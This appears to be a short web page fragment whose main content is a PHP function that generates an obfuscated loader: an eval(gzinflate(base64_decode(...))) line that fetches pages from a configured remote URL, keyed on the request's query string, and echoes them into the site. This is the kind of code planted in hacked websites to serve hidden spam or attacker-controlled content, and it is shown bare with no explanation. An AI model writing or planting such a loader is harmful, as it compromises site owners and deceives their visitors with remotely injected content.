- 1
 - 2
 - 3
 - 4
 - 5
 - 6
 
function getFileCode() {
    $url = "\$u=str_replace('%%KW%%', strtolower(\$_SERVER['QUERY_STRING']), '" . getConfigURL() . "')";
    $ind = "\$i=str_replace('%%KW%%', 'index', '" . getConfigURL() . "')";
    return "<?php eval(gzinflate(base64_decode('" . base64_encode(gzdeflate("$url;$ind;\$c=stream_context_create(array('http'=>array('timeout'=>3)));\$p=@file_get_contents(\$u,false,\$c);if(!\$p||(strpos(\$p,'404')!==false)){\$p=@file_get_contents(\$i,false,\$c);}echo \$p;")) . "'))); ?>";
}
                                    
 Follow us!